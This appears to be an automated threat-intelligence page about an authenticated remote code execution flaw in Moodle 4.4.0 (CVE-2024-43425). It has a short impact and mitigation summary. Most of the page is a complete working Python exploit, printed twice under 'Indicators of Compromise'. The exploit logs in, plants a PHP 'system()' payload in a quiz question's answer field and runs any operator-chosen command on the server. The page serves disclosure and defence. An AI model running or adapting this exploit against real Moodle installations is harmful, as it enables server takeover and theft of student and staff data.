Moodle 4.4.0 - Authenticated Remote Code Execution

Severity: criticalType: exploit

AI Analysis

Technical Summary

The reported security threat concerns an authenticated remote code execution (RCE) vulnerability in Moodle version 4.4.0. Moodle is a widely used open-source learning management system (LMS) deployed globally by educational institutions and organizations. An authenticated RCE vulnerability means that an attacker who has valid credentials on the Moodle platform can execute arbitrary code on the underlying server remotely. This type of vulnerability is particularly dangerous because it allows attackers to potentially take full control of the affected server, leading to data breaches, service disruption, or further lateral movement within the network. Although the affectedVersions field is empty, the title and description explicitly identify Moodle 4.4.0 as vulnerable. The exploit is categorized as critical severity and is confirmed to have publicly available exploit code written in Python, which facilitates exploitation by attackers with moderate technical skills. The lack of a patch link suggests that a fix may not yet be publicly available or widely distributed, increasing the urgency for organizations to apply mitigations. The vulnerability requires authentication, implying that attackers must have some level of access to the Moodle system, such as a student or staff account, to exploit the flaw. However, given the critical nature of RCE, even limited user privileges could be escalated to full system compromise. The exploit targets web-based components of Moodle, leveraging the platform's web interface to execute malicious commands remotely.

Potential Impact

For European organizations, especially educational institutions, universities, and training providers that rely heavily on Moodle for delivering online courses and managing learning content, this vulnerability poses a significant risk. Successful exploitation could lead to unauthorized access to sensitive student and staff data, including personal information, grades, and intellectual property. It could also result in service outages, undermining the continuity of educational activities. Moreover, compromised Moodle servers could be used as pivot points for broader network intrusions, potentially affecting other critical systems within an organization. The reputational damage and regulatory consequences under GDPR for data breaches could be severe. Since Moodle is widely adopted across Europe, the threat landscape is broad, and attackers could target multiple institutions simultaneously. The presence of public exploit code increases the likelihood of attacks, including opportunistic exploitation by less sophisticated threat actors.

Mitigation Recommendations

European organizations should immediately verify their Moodle version and restrict access to the platform to trusted users only. Since the vulnerability requires authentication, enforcing strong password policies, multi-factor authentication (MFA), and monitoring for unusual login patterns can reduce risk. Network segmentation should be applied to limit the Moodle server's access to other critical infrastructure. Organizations should monitor logs for suspicious activities indicative of exploitation attempts. Until an official patch is released, consider deploying web application firewalls (WAFs) with custom rules to detect and block exploit attempts targeting Moodle's web interface. Regular backups of Moodle data and server configurations should be maintained to enable rapid recovery. Additionally, organizations should engage with Moodle's security advisories and community to obtain updates and patches promptly once available. Conducting internal penetration testing focused on Moodle can help identify exploitation attempts and other vulnerabilities.

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Sweden, Poland, Austria

Indicators of Compromise

exploit-code: # Exploit Title: Moodle 4.4.0 - Authenticated Remote Code Execution # Exploit Author: Likhith Appalaneni # Vendor Homepage: https://moodle.org # Software Link: https://github.com/moodle/moodle/releases/tag/v4.4.0 # Tested Version: Moodle 4.4.0 # Affected versions: 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11 # Tested On: Ubuntu 22.04, Apache2, PHP 8.2 # CVE: CVE-2024-43425 # References: # - https://github.com/aninfosec/CVE-2024-43425-Poc # - https://nvd.nist.gov/vuln/detail/CVE-2024-43425 import argparse import requests import re import sys import subprocess from bs4 import BeautifulSoup import urllib.parse requests.packages.urllib3.disable_warnings() def get_login_token(session, login_url): print("[*] Step 1: GET /login/index.php to extract login token") try: response = session.get(login_url, verify=False) if response.status_code != 200: print(f"[-] Unexpected status code {response.status_code} when accessing login page") sys.exit(1) except Exception as e: print(f"[-] Error connecting to {login_url}: {e}") sys.exit(1) soup = BeautifulSoup(response.text, "html.parser") token_input = soup.find("input", {"name": "logintoken"}) if not token_input or not token_input.get("value"): print("[-] Failed to extract login token from HTML") sys.exit(1) token = token_input["value"] print(f"[+] Found login token: {token}") return token def perform_login(session, login_url, username, password, token): print("[*] Step 2: POST /login/index.php with credentials") login_payload = { "anchor": "", "logintoken": token, "username": username, "password": password, } try: response = session.post( login_url, data=login_payload, headers={"Content-Type": "application/x-www-form-urlencoded"}, verify=False, ) if response.status_code not in [200, 303]: print(f"[-] Unexpected response code during login: {response.status_code}") sys.exit(1) except Exception as e: print(f"[-] Login POST failed: {e}") sys.exit(1) if "MoodleSession" not in session.cookies.get_dict(): print("[-] Login may have failed: MoodleSession cookie missing") sys.exit(1) print("[+] Logged in successfully.") def get_quiz_info(session, base_url, cmid): print("[*] Extracting sesskey, courseContextId, and category from quiz edit page...") quiz_edit_url = f"{base_url}/mod/quiz/edit.php?cmid={cmid}" try: resp = session.get(quiz_edit_url, verify=False) if resp.status_code != 200: print(f"[-] Failed to load quiz edit page. Status: {resp.status_code}") sys.exit(1) # Extract sesskey sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', resp.text) # Extract courseContextId ctxid_match = re.search(r'"courseContextId":(\d+)', resp.text) # Extract category category_match = re.search(r';category=(\d+)', resp.text) if not (sesskey_match and ctxid_match and category_match): print("[-] Could not extract sesskey, courseContextId, or category") print(resp.text[:1000]) sys.exit(1) sesskey = sesskey_match.group(1) ctxid = ctxid_match.group(1) category = category_match.group(1) print(f"[+] Found sesskey: {sesskey}") print(f"[+] Found courseContextId: {ctxid}") print(f"[+] Found category: {category}") return sesskey, ctxid, category except Exception as e: print(f"[-] Exception while extracting quiz info: {e}") sys.exit(1) def upload_calculated_question(session, base_url, sesskey, cmid, courseid, category, ctxid): print("[*] Step 3: Uploading calculated question with payload...") url = f"{base_url}/question/bank/editquestion/question.php" payload = "(1)->{system($_GET[chr(97)])}" post_data = { "initialcategory": 1, "reload": 1, "shuffleanswers": 1, "answernumbering": "abc", "mform_isexpanded_id_answerhdr": 1, "noanswers": 1, "nounits": 1, "numhints": 2, "synchronize": "", "wizard": "datasetdefinitions", "id": "", "inpopup": 0, "cmid": cmid, "courseid": courseid, "returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0", "mdlscrollto": 0, "appendqnumstring": "addquestion", "qtype": "calculated", "makecopy": 0, "sesskey": sesskey, "_qf__qtype_calculated_edit_form": 1, "mform_isexpanded_id_generalheader": 1, "category": f"{category},{ctxid}", "name": "exploit", "questiontext[text]": "<p>test</p>", "questiontext[format]": 1, "questiontext[itemid]": 623548580, "status": "ready", "defaultmark": 1, "generalfeedback[text]": "", "generalfeedback[format]": 1, "generalfeedback[itemid]": 21978947, "answer[0]": payload, "fraction[0]": 1.0, "tolerance[0]": 0.01, "tolerancetype[0]": 1, "correctanswerlength[0]": 2, "correctanswerformat[0]": 1, "feedback[0][text]": "", "feedback[0][format]": 1, "feedback[0][itemid]": 281384971, "unitrole": 3, "penalty": 0.3333333, "hint[0][text]": "", "hint[0][format]": 1, "hint[0][itemid]": 812786292, "hint[1][text]": "", "hint[1][format]": 1, "hint[1][itemid]": 795720000, "tags": "_qf__force_multiselect_submission", "submitbutton": "Save changes" } try: res = session.post(url, data=post_data, verify=False, allow_redirects=False) if res.status_code in [302, 303] and "Location" in res.headers and "&id=" in res.headers["Location"]: print("[+] Question upload request sent. Extracting question ID from redirect.") qid = re.search(r"&id=(\d+)", res.headers["Location"]) if not qid: print("[-] Could not extract question ID from redirect.") sys.exit(1) return qid.group(1) else: print(f"[-] Upload failed. Status code: {res.status_code}") sys.exit(1) except Exception as e: print(f"[-] Upload exception: {e}") sys.exit(1) def post_dataset_wizard(session, base_url, question_id, sesskey, cmid, courseid, category, ctxid): print("[*] Step 4: Completing dataset wizard with dataset[0]=0") wizard_url = f"{base_url}/question/bank/editquestion/question.php?wizardnow=datasetdefinitions" data_payload = { "id": question_id, "inpopup": 0, "cmid": cmid, "courseid": courseid, "returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0", "mdlscrollto": 0, "appendqnumstring": "addquestion", "category": f"{category},{ctxid}", "wizard": "datasetitems", "sesskey": sesskey, "_qf__question_dataset_dependent_definitions_form": 1, "dataset[0]": 0, "synchronize": 0, "submitbutton": "Next page" } try: res = session.post(wizard_url, data=data_payload, verify=False) if res.status_code == 200: print("[+] Dataset wizard POST submitted.") return False elif "Exception - system(): Argument #1 ($command) cannot be empty" in res.text: print("[+] Reached expected error page. Payload is being interpreted.") return True else: print(f"[-] Dataset wizard POST failed with status: {res.status_code}") return False except Exception as e: print(f"[-] Exception during dataset wizard step: {e}") return False def trigger_rce(session, base_url, question_id, category, cmid, courseid, cmd): print("[*] Step 5: Triggering command: {cmd}") encoded = urllib.parse.quote(cmd) trigger_url = ( f"{base_url}/question/bank/editquestion/question.php?id={question_id}" f"&category={category}&cmid={cmid}&courseid={courseid}" f"&wizardnow=datasetitems&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D{cmid}%26addonpage%3D0" f"&appendqnumstring=addquestion&mdlscrollto=0&a={encoded}" ) try: resp = session.get(trigger_url, verify=False) print("[+] Trigger request sent. Output below:\n") lines = resp.text.splitlines() output_lines = [] for line in lines: if "<html" in line.lower(): break if line.strip(): output_lines.append(line.strip()) print("[+] Command output (top lines):") print("\n".join(output_lines[:2]) if output_lines else "[!] No output detected.") except Exception as e: print(f"[-] Error triggering command: {e}") sys.exit(1) def main(): parser = argparse.ArgumentParser(description="Moodle CVE-2024-43425 Exploit") parser.add_argument("--url", required=True, help="Target Moodle base URL") parser.add_argument("--username", required=True, help="Moodle username") parser.add_argument("--password", required=True, help="Moodle password") parser.add_argument("--courseid", required=True, help="Course ID") parser.add_argument("--cmid", required=True, help="Course Module ID (Quiz)") parser.add_argument("--cmd", required=True, help="Command to execute remotely (e.g., 'whoami' or 'cat /flag')") args = parser.parse_args() session = requests.Session() login_url = f"{args.url.rstrip('/')}/login/index.php" token = get_login_token(session, login_url) perform_login(session, login_url, args.username, args.password, token) sesskey, ctxid, category = get_quiz_info(session, args.url.rstrip('/'), args.cmid) question_id = upload_calculated_question(session, args.url.rstrip('/'), sesskey, args.cmid, args.courseid, category, ctxid) if not post_dataset_wizard(session, args.url.rstrip('/'), question_id, sesskey, args.cmid, args.courseid, category, ctxid): sys.exit(1) trigger_rce(session, args.url.rstrip('/'), question_id, category, args.cmid, args.courseid, args.cmd) if __name__ == "__main__": main()

Moodle 4.4.0 - Authenticated Remote Code Execution

Severity: critical

Type: exploit

Moodle 4.4.0 - Authenticated Remote Code Execution

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Sweden, Poland, Austria

Indicators of Compromise

exploit-code: # Exploit Title: Moodle 4.4.0 - Authenticated Remote Code Execution # Exploit Author: Likhith Appalaneni # Vendor Homepage: https://moodle.org # Software Link: https://github.com/moodle/moodle/releases/tag/v4.4.0 # Tested Version: Moodle 4.4.0 # Affected versions: 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11 # Tested On: Ubuntu 22.04, Apache2, PHP 8.2 # CVE: CVE-2024-43425 # References: # - https://github.com/aninfosec/CVE-2024-43425-Poc # - https://nvd.nist.gov/vuln/detail/CVE-2024-43425 import argparse import requests import re import sys import subprocess from bs4 import BeautifulSoup import urllib.parse requests.packages.urllib3.disable_warnings() def get_login_token(session, login_url): print("[*] Step 1: GET /login/index.php to extract login token") try: response = session.get(login_url, verify=False) if response.status_code != 200: print(f"[-] Unexpected status code {response.status_code} when accessing login page") sys.exit(1) except Exception as e: print(f"[-] Error connecting to {login_url}: {e}") sys.exit(1) soup = BeautifulSoup(response.text, "html.parser") token_input = soup.find("input", {"name": "logintoken"}) if not token_input or not token_input.get("value"): print("[-] Failed to extract login token from HTML") sys.exit(1) token = token_input["value"] print(f"[+] Found login token: {token}") return token def perform_login(session, login_url, username, password, token): print("[*] Step 2: POST /login/index.php with credentials") login_payload = { "anchor": "", "logintoken": token, "username": username, "password": password, } try: response = session.post( login_url, data=login_payload, headers={"Content-Type": "application/x-www-form-urlencoded"}, verify=False, ) if response.status_code not in [200, 303]: print(f"[-] Unexpected response code during login: {response.status_code}") sys.exit(1) except Exception as e: print(f"[-] Login POST failed: {e}") sys.exit(1) if "MoodleSession" not in session.cookies.get_dict(): print("[-] Login may have failed: MoodleSession cookie missing") sys.exit(1) print("[+] Logged in successfully.") def get_quiz_info(session, base_url, cmid): print("[*] Extracting sesskey, courseContextId, and category from quiz edit page...") quiz_edit_url = f"{base_url}/mod/quiz/edit.php?cmid={cmid}" try: resp = session.get(quiz_edit_url, verify=False) if resp.status_code != 200: print(f"[-] Failed to load quiz edit page. Status: {resp.status_code}") sys.exit(1) # Extract sesskey sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', resp.text) # Extract courseContextId ctxid_match = re.search(r'"courseContextId":(\d+)', resp.text) # Extract category category_match = re.search(r';category=(\d+)', resp.text) if not (sesskey_match and ctxid_match and category_match): print("[-] Could not extract sesskey, courseContextId, or category") print(resp.text[:1000]) sys.exit(1) sesskey = sesskey_match.group(1) ctxid = ctxid_match.group(1) category = category_match.group(1) print(f"[+] Found sesskey: {sesskey}") print(f"[+] Found courseContextId: {ctxid}") print(f"[+] Found category: {category}") return sesskey, ctxid, category except Exception as e: print(f"[-] Exception while extracting quiz info: {e}") sys.exit(1) def upload_calculated_question(session, base_url, sesskey, cmid, courseid, category, ctxid): print("[*] Step 3: Uploading calculated question with payload...") url = f"{base_url}/question/bank/editquestion/question.php" payload = "(1)->{system($_GET[chr(97)])}" post_data = { "initialcategory": 1, "reload": 1, "shuffleanswers": 1, "answernumbering": "abc", "mform_isexpanded_id_answerhdr": 1, "noanswers": 1, "nounits": 1, "numhints": 2, "synchronize": "", "wizard": "datasetdefinitions", "id": "", "inpopup": 0, "cmid": cmid, "courseid": courseid, "returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0", "mdlscrollto": 0, "appendqnumstring": "addquestion", "qtype": "calculated", "makecopy": 0, "sesskey": sesskey, "_qf__qtype_calculated_edit_form": 1, "mform_isexpanded_id_generalheader": 1, "category": f"{category},{ctxid}", "name": "exploit", "questiontext[text]": "<p>test</p>", "questiontext[format]": 1, "questiontext[itemid]": 623548580, "status": "ready", "defaultmark": 1, "generalfeedback[text]": "", "generalfeedback[format]": 1, "generalfeedback[itemid]": 21978947, "answer[0]": payload, "fraction[0]": 1.0, "tolerance[0]": 0.01, "tolerancetype[0]": 1, "correctanswerlength[0]": 2, "correctanswerformat[0]": 1, "feedback[0][text]": "", "feedback[0][format]": 1, "feedback[0][itemid]": 281384971, "unitrole": 3, "penalty": 0.3333333, "hint[0][text]": "", "hint[0][format]": 1, "hint[0][itemid]": 812786292, "hint[1][text]": "", "hint[1][format]": 1, "hint[1][itemid]": 795720000, "tags": "_qf__force_multiselect_submission", "submitbutton": "Save changes" } try: res = session.post(url, data=post_data, verify=False, allow_redirects=False) if res.status_code in [302, 303] and "Location" in res.headers and "&id=" in res.headers["Location"]: print("[+] Question upload request sent. Extracting question ID from redirect.") qid = re.search(r"&id=(\d+)", res.headers["Location"]) if not qid: print("[-] Could not extract question ID from redirect.") sys.exit(1) return qid.group(1) else: print(f"[-] Upload failed. Status code: {res.status_code}") sys.exit(1) except Exception as e: print(f"[-] Upload exception: {e}") sys.exit(1) def post_dataset_wizard(session, base_url, question_id, sesskey, cmid, courseid, category, ctxid): print("[*] Step 4: Completing dataset wizard with dataset[0]=0") wizard_url = f"{base_url}/question/bank/editquestion/question.php?wizardnow=datasetdefinitions" data_payload = { "id": question_id, "inpopup": 0, "cmid": cmid, "courseid": courseid, "returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0", "mdlscrollto": 0, "appendqnumstring": "addquestion", "category": f"{category},{ctxid}", "wizard": "datasetitems", "sesskey": sesskey, "_qf__question_dataset_dependent_definitions_form": 1, "dataset[0]": 0, "synchronize": 0, "submitbutton": "Next page" } try: res = session.post(wizard_url, data=data_payload, verify=False) if res.status_code == 200: print("[+] Dataset wizard POST submitted.") return False elif "Exception - system(): Argument #1 ($command) cannot be empty" in res.text: print("[+] Reached expected error page. Payload is being interpreted.") return True else: print(f"[-] Dataset wizard POST failed with status: {res.status_code}") return False except Exception as e: print(f"[-] Exception during dataset wizard step: {e}") return False def trigger_rce(session, base_url, question_id, category, cmid, courseid, cmd): print("[*] Step 5: Triggering command: {cmd}") encoded = urllib.parse.quote(cmd) trigger_url = ( f"{base_url}/question/bank/editquestion/question.php?id={question_id}" f"&category={category}&cmid={cmid}&courseid={courseid}" f"&wizardnow=datasetitems&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D{cmid}%26addonpage%3D0" f"&appendqnumstring=addquestion&mdlscrollto=0&a={encoded}" ) try: resp = session.get(trigger_url, verify=False) print("[+] Trigger request sent. Output below:\n") lines = resp.text.splitlines() output_lines = [] for line in lines: if "<html" in line.lower(): break if line.strip(): output_lines.append(line.strip()) print("[+] Command output (top lines):") print("\n".join(output_lines[:2]) if output_lines else "[!] No output detected.") except Exception as e: print(f"[-] Error triggering command: {e}") sys.exit(1) def main(): parser = argparse.ArgumentParser(description="Moodle CVE-2024-43425 Exploit") parser.add_argument("--url", required=True, help="Target Moodle base URL") parser.add_argument("--username", required=True, help="Moodle username") parser.add_argument("--password", required=True, help="Moodle password") parser.add_argument("--courseid", required=True, help="Course ID") parser.add_argument("--cmid", required=True, help="Course Module ID (Quiz)") parser.add_argument("--cmd", required=True, help="Command to execute remotely (e.g., 'whoami' or 'cat /flag')") args = parser.parse_args() session = requests.Session() login_url = f"{args.url.rstrip('/')}/login/index.php" token = get_login_token(session, login_url) perform_login(session, login_url, args.username, args.password, token) sesskey, ctxid, category = get_quiz_info(session, args.url.rstrip('/'), args.cmid) question_id = upload_calculated_question(session, args.url.rstrip('/'), sesskey, args.cmid, args.courseid, category, ctxid) if not post_dataset_wizard(session, args.url.rstrip('/'), question_id, sesskey, args.cmid, args.courseid, category, ctxid): sys.exit(1) trigger_rce(session, args.url.rstrip('/'), question_id, category, args.cmid, args.courseid, args.cmd) if __name__ == "__main__": main()

Source: Exploit-DB RSS Feed

Published: Wed Jul 02 2025

Moodle 4.4.0 - Authenticated Remote Code Execution

Critical

Exploitremote web exploit

Published: Wed Jul 02 2025 (07/02/2025, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

Moodle 4.4.0 - Authenticated Remote Code Execution

AI-Powered Analysis

AILast updated: 07/16/2025, 21:22:24 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Get Pro

Pro Feature

For access to advanced analysis and higher rate limits, contact root@offseq.com

Technical Details

Edb Id: 52350
Has Exploit Code: true
Code Language: python

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for Moodle 4.4.0 - Authenticated Remote Code Execution

# Exploit Title: Moodle 4.4.0 - Authenticated Remote Code Execution
# Exploit Author: Likhith Appalaneni
# Vendor Homepage: https://moodle.org
# Software Link: https://github.com/moodle/moodle/releases/tag/v4.4.0
# Tested Version: Moodle 4.4.0
# Affected versions: 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11
# Tested On: Ubuntu 22.04, Apache2, PHP 8.2
# CVE: CVE-2024-43425
# References:
# - https://github.com/aninfosec/CVE-2024-43425-Poc
# - https://nvd.nist.gov/vuln/detail/CVE-2024-4... (9835 more characters)

Code Length: 10,335 characters

Threat ID: 68653a7e6f40f0eb7292ddf7

Added to database: 7/2/2025, 1:56:14 PM

Last enriched: 7/16/2025, 9:22:24 PM

Last updated: 7/16/2025, 9:22:24 PM